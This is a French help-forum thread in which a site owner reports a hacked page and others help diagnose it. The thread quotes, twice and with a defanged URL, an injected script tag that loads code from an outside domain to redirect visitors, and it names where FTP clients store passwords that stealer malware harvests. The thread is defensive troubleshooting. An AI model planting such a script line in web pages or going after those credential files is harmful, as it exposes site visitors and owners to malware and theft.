Site hacker
Résolu
Utilisateur anonyme
-
Utilisateur anonyme -
Utilisateur anonyme -
Bonjour,
J'ai un hébergeur avec 3 site on est 3 personne tres proche famille et tres bon amis
chacun son site.
une personne a son site hacker, c'est google qui a signaler et en regardant de plus pres effectivement.
je dit a la personne c'est surement un script qui coince ca nous l avait vfait sur le mien mais non la 4 fichiers redirige vers site malveillant....
j'ouvre les 4 pages ctr+f pour rechercher script et la je trouve effectivement ceci:
il me dit j utilise pas javascript ok alors le pote pense a un prog mais voila il uttilise pas de prog. même pas le ftp de notepad++. il fait tout au block note de base.
donc on se dit il a les code ftp...
dela on réfléchis comment...
moi je connais un peu la sécu un peu zhp etc j ai tout regarder mon pc nikel et franchement il est surveiller tout le temps.
le pote pareil pc ok
alors on pense que c'est le pc de la personne qui est hacké et il a récupérer les code ftp....
1/ Qu en pensé vous? ps j ai changer tout les codes par des sécu 100% et crypter le txt qui les contient pour mon pc.
2/ le pote webmaster et moi on comprend pas un truc
le script redirige sur la becane!!!!!!
je me explique
j ai un serveur easy php en local sur localhost http://localhost et qant je vais sur le liens que je confirme que je veut prendre e risque etc la redirection c'est sur ma page de mon serveur localhost don lindex de mon site local!!!!!!!!
la on est larguer!
a quoi ca lui sert???? pour mon pote c'est un débutant qui s entraine car ce qu'il a fait il me dit ca sert a rien!.
3/il l a les codes ftp au lieu de mettre ca qui sert a rien il aurait pu tout effacer...du coup je me demande si sasns code ftp il peut ecrire dans la page .html et les .php sont pas infecté.
dernier truc oublier j ai changer direct les codes car j ai sorti les 4 html vérollé et ce soir j ai vu que lui il a lever une ligne et lever <html> et <body> et une ligne de code et ca ca c'est passer a 2heure du mat quan jetais la j l ai vu en comparant le fichier de 20h a ceux de ce matin
la je suis vert 2 problme de sécu en 24h un facebook 1 celui la!!!
merci d avance
Plusieurs problèmes font parfois une solution...
J'ai un hébergeur avec 3 site on est 3 personne tres proche famille et tres bon amis
chacun son site.
une personne a son site hacker, c'est google qui a signaler et en regardant de plus pres effectivement.
je dit a la personne c'est surement un script qui coince ca nous l avait vfait sur le mien mais non la 4 fichiers redirige vers site malveillant....
j'ouvre les 4 pages ctr+f pour rechercher script et la je trouve effectivement ceci:
<!--359e2d--><script type="text/javascript" src="http : / / www.beini.de/comments.php]"></script><!--/359e2d-->
il me dit j utilise pas javascript ok alors le pote pense a un prog mais voila il uttilise pas de prog. même pas le ftp de notepad++. il fait tout au block note de base.
donc on se dit il a les code ftp...
dela on réfléchis comment...
moi je connais un peu la sécu un peu zhp etc j ai tout regarder mon pc nikel et franchement il est surveiller tout le temps.
le pote pareil pc ok
alors on pense que c'est le pc de la personne qui est hacké et il a récupérer les code ftp....
1/ Qu en pensé vous? ps j ai changer tout les codes par des sécu 100% et crypter le txt qui les contient pour mon pc.
2/ le pote webmaster et moi on comprend pas un truc
le script redirige sur la becane!!!!!!
je me explique
j ai un serveur easy php en local sur localhost http://localhost et qant je vais sur le liens que je confirme que je veut prendre e risque etc la redirection c'est sur ma page de mon serveur localhost don lindex de mon site local!!!!!!!!
la on est larguer!
a quoi ca lui sert???? pour mon pote c'est un débutant qui s entraine car ce qu'il a fait il me dit ca sert a rien!.
3/il l a les codes ftp au lieu de mettre ca qui sert a rien il aurait pu tout effacer...du coup je me demande si sasns code ftp il peut ecrire dans la page .html et les .php sont pas infecté.
dernier truc oublier j ai changer direct les codes car j ai sorti les 4 html vérollé et ce soir j ai vu que lui il a lever une ligne et lever <html> et <body> et une ligne de code et ca ca c'est passer a 2heure du mat quan jetais la j l ai vu en comparant le fichier de 20h a ceux de ce matin
la je suis vert 2 problme de sécu en 24h un facebook 1 celui la!!!
merci d avance
Plusieurs problèmes font parfois une solution...
A voir également:
- Sitehacker
- Site comme coco - Accueil - Réseaux sociaux
- Site de telechargement - Accueil - Outils
- Quel site remplace coco - Accueil - Réseaux sociaux
- Site x - Guide
- Site pour vendre des objets d'occasion - Guide
7 réponses
lut;)
j'ai eu le même genre de soucis ....
https://forums.commentcamarche.net/forum/affich-29833003-redirection-vers-http-127-0-0-1
si cela peut te servir,
sinon il me faudrait l'url des 3 sites concernés ( même en MP si tu veux )
et surtout savoir si :
- tu as une sauvegarde complète
- si ton pc est 'clean' de chez clean ...
@+
j'ai eu le même genre de soucis ....
https://forums.commentcamarche.net/forum/affich-29833003-redirection-vers-http-127-0-0-1
si cela peut te servir,
sinon il me faudrait l'url des 3 sites concernés ( même en MP si tu veux )
et surtout savoir si :
- tu as une sauvegarde complète
- si ton pc est 'clean' de chez clean ...
@+
Au lieu de filezilla utilise l'extention fireFTP pour firefox : les MP stockés sont cryptés
Si tu rajoute un MP principal à firefox il est normalement impossible à un stealer d'acceder à la base des MP dans signon.sqlite pour dé-hasher les MP avec la clé d'encryption stockée dans firefox.
Le mot de passe principal firefox se met par dessus la base des MP et lui n'est pas stocké donc non récupérable.
et surtout nettoyer le pc infecté par rootkit, virer filezilla (totalement car les MP ne sont pas stockés dans programfiles / filezilla mais dans C/ documents and setting / nom du user / application data / filezilla / sitemanager.xml). Le dossier filezilla dans application data doit être supprimé manuellement !
Si tu rajoute un MP principal à firefox il est normalement impossible à un stealer d'acceder à la base des MP dans signon.sqlite pour dé-hasher les MP avec la clé d'encryption stockée dans firefox.
Le mot de passe principal firefox se met par dessus la base des MP et lui n'est pas stocké donc non récupérable.
et surtout nettoyer le pc infecté par rootkit, virer filezilla (totalement car les MP ne sont pas stockés dans programfiles / filezilla mais dans C/ documents and setting / nom du user / application data / filezilla / sitemanager.xml). Le dossier filezilla dans application data doit être supprimé manuellement !
Bien vue animostab tu viens de me faire ouvrir les yeux c'est hallucinant !
chez moi c'est C:\Users\codeurH24\AppData\Roaming\FileZilla\sitemanager.xml
Le pire pour moi c'est que ça ne met pas en danger que moi mais aussi les gens qui me confisent leurs hébergements web dont parfois quelques sociétés.
je vais remédier a ça.
chez moi c'est C:\Users\codeurH24\AppData\Roaming\FileZilla\sitemanager.xml
Le pire pour moi c'est que ça ne met pas en danger que moi mais aussi les gens qui me confisent leurs hébergements web dont parfois quelques sociétés.
je vais remédier a ça.
les mp notepad++ sont dans un fichier nommé
NppFTP.xml (faire rechercher fichier)
voir si les MP sont en clair ou crytpés
apparemment les version 0.2.3.0 and 0.2.4.0 de NppFTP sont vulnérables et permettent un remote acces dans le système d'exploitation
Pour la dernière version 0.25 je n'en sais rien
NppFTP.xml (faire rechercher fichier)
voir si les MP sont en clair ou crytpés
apparemment les version 0.2.3.0 and 0.2.4.0 de NppFTP sont vulnérables et permettent un remote acces dans le système d'exploitation
Pour la dernière version 0.25 je n'en sais rien
Bien que je n'ai pas tout compris voici ce que j'en pense
si le fichier infecté est aussi sur un local ---> virus ou exploit
y a t il filezilla avec les MP enregistré ?
certains exploit avec filezilla rajoutent la ligne javascript sur l'index et autres, envoient sur le serveur distant et récupèrent en passant les MP login ftp tout ca en moins d'une seconde!
si le fichier infecté uniquement sur le serveur distant --> MP login FTP hacké soit directement chez l'hebergeur soit sur le pc local
ces conneries d'exploit servent a propager l'infection par le biais d'exploit + infecter les machines (pups botnets trojans etc ...)
si le fichier infecté est aussi sur un local ---> virus ou exploit
y a t il filezilla avec les MP enregistré ?
certains exploit avec filezilla rajoutent la ligne javascript sur l'index et autres, envoient sur le serveur distant et récupèrent en passant les MP login ftp tout ca en moins d'une seconde!
si le fichier infecté uniquement sur le serveur distant --> MP login FTP hacké soit directement chez l'hebergeur soit sur le pc local
ces conneries d'exploit servent a propager l'infection par le biais d'exploit + infecter les machines (pups botnets trojans etc ...)
salut,
désolé de pas avoir répondut avant,
merci de répondre...
filezilla avec les MP enregistré
oui moi (2 pc mon portable que mon beau pere uttilise souvent, et le miens oui sur)+ le pce de mon beau pere qui est infecté depuis les derniere nouvelles.... (ROOTKIT), ja i tout reussit a enlever sauf le rootkit.
pour moi ton explication coïncide, nous on as pensé à un hackeur.
je récise pour etre clair
un Hebregeur : qu heberge 3 sites...
1 le mien
2 l amis webmaster abvec son site
3 le beau pere avec son site
éventuellement co sur le ftp y a 4 pc le mien, mon portable, le pc du beau pere et celui de l'amis.
3 sont clean sur et certain...
1 non
j'en suis la...
désolé de pas avoir répondut avant,
merci de répondre...
filezilla avec les MP enregistré
oui moi (2 pc mon portable que mon beau pere uttilise souvent, et le miens oui sur)+ le pce de mon beau pere qui est infecté depuis les derniere nouvelles.... (ROOTKIT), ja i tout reussit a enlever sauf le rootkit.
pour moi ton explication coïncide, nous on as pensé à un hackeur.
je récise pour etre clair
un Hebregeur : qu heberge 3 sites...
1 le mien
2 l amis webmaster abvec son site
3 le beau pere avec son site
éventuellement co sur le ftp y a 4 pc le mien, mon portable, le pc du beau pere et celui de l'amis.
3 sont clean sur et certain...
1 non
j'en suis la...
Vous n’avez pas trouvé la réponse que vous recherchez ?
Posez votre question
Donc le résume la je suis en train de voir pour le rootkit...
puis j ai changer le mot de passe ftp est recréer 4 compte ftp
1 par site et celui de l'arborescence générale
tous les code sont complexe genre Moncode579154
et DIFFÉRENT au cas ou le hacker passe pas le pc de mon beau pere ou par file zilla comme évoquer ce que je connais pas mais ont l'utilisent
Plusieurs problèmes font parfois une solution...
puis j ai changer le mot de passe ftp est recréer 4 compte ftp
1 par site et celui de l'arborescence générale
tous les code sont complexe genre Moncode579154
et DIFFÉRENT au cas ou le hacker passe pas le pc de mon beau pere ou par file zilla comme évoquer ce que je connais pas mais ont l'utilisent
Plusieurs problèmes font parfois une solution...
Super je te remercie,
bon deja coté rootkit on à vérifier dans le forum sécurité et c'est bon les 4 pc utilisés sont propres.
ok on va faire ca,, deja on pensé supprimé filezilla mais c'est vrais que je savais pas pour les mots de passes stockés.
par contre on se sert aussi de notepad++ enfin du plug intégrer nommé NPPFTP.
tu pense qu'il assez est sécurisé, ou vaut mieux arrêter de l'utiliser ?
bon deja coté rootkit on à vérifier dans le forum sécurité et c'est bon les 4 pc utilisés sont propres.
ok on va faire ca,, deja on pensé supprimé filezilla mais c'est vrais que je savais pas pour les mots de passes stockés.
par contre on se sert aussi de notepad++ enfin du plug intégrer nommé NPPFTP.
tu pense qu'il assez est sécurisé, ou vaut mieux arrêter de l'utiliser ?
Regarde le post de codeurh24 et ma réponse (plus haut) : c'est mitigé
On trouve sur le net l'algorithme qui permet de decoder encoder les MP dans NPPFTP mais c'est en C++ donc il faudrait le compiler avec en plus un prog qui fait le meme boulot que l'exploit de filezilla.
Donc NPPFTP (dernière version) stocke les MP en crypté. il n'existe pas de prog connu qui décrypte et recupère les MP pour faire un sale boulot mais c'est possible de le faire
FireFTP + firefox + mot de passe principal firefox = apparemment totalement sécurisé.
On trouve sur le net l'algorithme qui permet de decoder encoder les MP dans NPPFTP mais c'est en C++ donc il faudrait le compiler avec en plus un prog qui fait le meme boulot que l'exploit de filezilla.
Donc NPPFTP (dernière version) stocke les MP en crypté. il n'existe pas de prog connu qui décrypte et recupère les MP pour faire un sale boulot mais c'est possible de le faire
FireFTP + firefox + mot de passe principal firefox = apparemment totalement sécurisé.
re ;)
mais ^^pourquoi te casses-tu la t^te là dessus ???
juste quelques principes de base ( changement de mdp , vérification des PC, etc ...)
+ tout supprimer en ligne
+ tout remettre à partir d'une sauvegarde saine
+ demande à GG de lever cette sanction ...
as-tu au mois fait ou essayé cela ???
mais ^^pourquoi te casses-tu la t^te là dessus ???
juste quelques principes de base ( changement de mdp , vérification des PC, etc ...)
+ tout supprimer en ligne
+ tout remettre à partir d'une sauvegarde saine
+ demande à GG de lever cette sanction ...
as-tu au mois fait ou essayé cela ???
salut, dej adsl j'ai manqué de temps.
mais c'est bon des que on à changer les codes plus de fichiers modifier,
ont virent mozilla aussi par la même occasion. J'ai un pc sur 4 (celui de mon beau pere, le seul que j ai pas pu vérifier le soir meme) qui était infecté d'un virus risque élevé (meme plusieurs mais un processus actif.) maintenant c'est clean j'ai fait vérifier par un contributeur sécu les différents pc (que je remercie d'ailleurs Malekal morte).
bg62 coté sauvegarde aussi on est ok elles sont bonnes il me reste un truc a faire que j ai pas fait c'est supprimer le message erreur google mais je m en occupe sous peu je l'ais deja fait, meme si je me rappelle plus comment, ca doit pas etre sorcier.
virus ou pas on pense à la faille évoqué sur mozilla car le pc à pas était touché et le plus bizarre c'est que c'est le site le plus leger qui à était attaqué, alors que les autres ont du javascript des bases de données etc.... (le plus simple peut etre ou alors peut être du a l arborescence qui était pas la même, c'est a dire que nous ont est dans Public_html lui il est dans www au début je savait pas trop la différence que je sait toujours pas d'ailleurs^^... est ce peut etre pour cela que le pc du beau pere est en cause et que le hackeur n'ai pas pu remonté ou n'as pas vu toutes l'arborescence dans file zilla mais la je sait pas je cale...)
puis ca sert à rien ce qu'il a fait!
Je vous remercie à tous je passe en résolut.
mais c'est bon des que on à changer les codes plus de fichiers modifier,
ont virent mozilla aussi par la même occasion. J'ai un pc sur 4 (celui de mon beau pere, le seul que j ai pas pu vérifier le soir meme) qui était infecté d'un virus risque élevé (meme plusieurs mais un processus actif.) maintenant c'est clean j'ai fait vérifier par un contributeur sécu les différents pc (que je remercie d'ailleurs Malekal morte).
bg62 coté sauvegarde aussi on est ok elles sont bonnes il me reste un truc a faire que j ai pas fait c'est supprimer le message erreur google mais je m en occupe sous peu je l'ais deja fait, meme si je me rappelle plus comment, ca doit pas etre sorcier.
virus ou pas on pense à la faille évoqué sur mozilla car le pc à pas était touché et le plus bizarre c'est que c'est le site le plus leger qui à était attaqué, alors que les autres ont du javascript des bases de données etc.... (le plus simple peut etre ou alors peut être du a l arborescence qui était pas la même, c'est a dire que nous ont est dans Public_html lui il est dans www au début je savait pas trop la différence que je sait toujours pas d'ailleurs^^... est ce peut etre pour cela que le pc du beau pere est en cause et que le hackeur n'ai pas pu remonté ou n'as pas vu toutes l'arborescence dans file zilla mais la je sait pas je cale...)
puis ca sert à rien ce qu'il a fait!
Je vous remercie à tous je passe en résolut.
ben là tu as tout faux ...
"il me reste un truc a faire que j ai pas fait c'est supprimer le message erreur google mais je m en occupe sous peu je l'ais deja fait, meme si je me rappelle plus comment, ca doit pas etre sorcier. "
tant que GG n'a pas été sollicité pour une nouvelle vérification de ces sites / liens, la situation sera toujours la m^me :)
et pour le faire je t'ai déjà donné les liens ... :)
@+
ps : mis en résolu = pour moi, perso, NON !!! ton problème existe toujours ...
"il me reste un truc a faire que j ai pas fait c'est supprimer le message erreur google mais je m en occupe sous peu je l'ais deja fait, meme si je me rappelle plus comment, ca doit pas etre sorcier. "
tant que GG n'a pas été sollicité pour une nouvelle vérification de ces sites / liens, la situation sera toujours la m^me :)
et pour le faire je t'ai déjà donné les liens ... :)
@+
ps : mis en résolu = pour moi, perso, NON !!! ton problème existe toujours ...
A essayer enlever la ligne <!--359e2d--><script type="text/javascript" src="http : / / www. beini .de/comments.php]"></script><!--/359e2d-->
uploader sur le distant / ouvrir la page avec javascript désactivé / regarder la code source si il n'y a plus la ligne javascript / si pas de ligne activer javascript regarder si ca redirige.
d'où la question ' sauvegarde ' ou pas ...
j'ai modifié les liens vers la redirection ...: page malveillante ;)
https://forums.commentcamarche.net/forum/affich-30880898-site-hacker#2
deja merci bg62 je vais voir les liens.
les 3 site je vais les donnée ici je m en fou sont public seulement un est bloqué par google bertolkien.
Site 1
http://lionzone.fr/
Site 2
http://www.codeurh24.com/ qui est aussi heberger sur le meme serveur il a prix un autre nom de domaine a 0.90 centime d euro je crois lol... et il est héberger sur lionzone.fr
Site 3
http://www.bertolkien.lionzone.fr/
ATTENTION c'est apparemment le seul hacké.
et surtout savoir si :
- tu as une sauvegarde complète
- si ton pc est 'clean' de chez clean ...
sauvegarde oui chacun a la sienne.
PC clean SUR 4 3 OUI sur et certain l'autre je pensé que non c'est confirmé il etait infecté et rete un rootkit que je n'arrive pas a supprimé mais je vais poster ens écurité des que j ai le pc sous la main.
merci
salut et merci je vais regarder ca de suite.
Si le hackeur devais ce servir de mon pc, il aurais bcp de mal avec mon encodage qui dure 4jours et qui prend 99% de mes ressources.
J'exclus donc que le hackeur c'est servis de mon site ou de mon pc.